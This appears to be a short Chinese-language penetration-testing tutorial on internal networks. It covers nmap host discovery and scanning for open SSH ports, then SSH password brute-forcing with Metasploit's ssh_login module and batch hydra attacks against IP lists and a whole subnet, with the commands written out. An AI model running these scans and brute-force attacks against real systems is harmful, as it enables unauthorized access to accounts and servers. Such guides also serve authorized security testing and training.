1、收集IP信息:
(1)獲取內網IP地址段,使用ping 內網系統的域名,得到內網IP地址段:
(2)使用: nmap -sP 192.168.10.0/24 網段內活着的IP地址:發現活着的IP主機有256個,即192.168.10.0-192.168.10.255
nmap具體使用方法可以參考:
https://www.cnblogs.com/justn0w/articles/10177612.html
2、掃描開放22端口的IP:
(1)將收集到的活着的ip放到一個txt文件夾中,利用:nmap -iL ip.txt 進行批量掃描端口;

(2)使用:nmap -PR -oN /home/xh/shentou/out.log 192.168.10.0/24 直接 掃描一個網段內所有的iP,掃描的結果會保存在out.log里面;
3.使用Metasploit工具進行ssh爆破:
(1)在kali機器中,在終端輸入msfconsole,打開metasploit工具;
(2)先打開MSF 進入ssh_login模塊 show options查看提示。本次使用用戶字典和密碼字典進行ssh爆破。
終端輸入: use auxiliary/scanner/ssh_login
(3) show options
(4) 准備進行ssh爆破;
設置用戶名字典和密碼字典的路徑;設置靶機的IP地址;設置線程為20;開始執行;

4、使用hydra批量IP主機爆破:
可以參考:
https://www.freebuf.com/sectool/170779.html進行批量破解;
./hydra.sh -p ./password.txt -f ./iplist.txt #對文件中的IP進行破解
./hydra.sh -p ./password.txt -l 192.168.9.0/24 #對網段中的IP進行破解
如下:sudo sh hydra.sh -p /home/xh/shentou/pwd_ssh1.txt -f /home/xh/shentou/22_iplist.txt
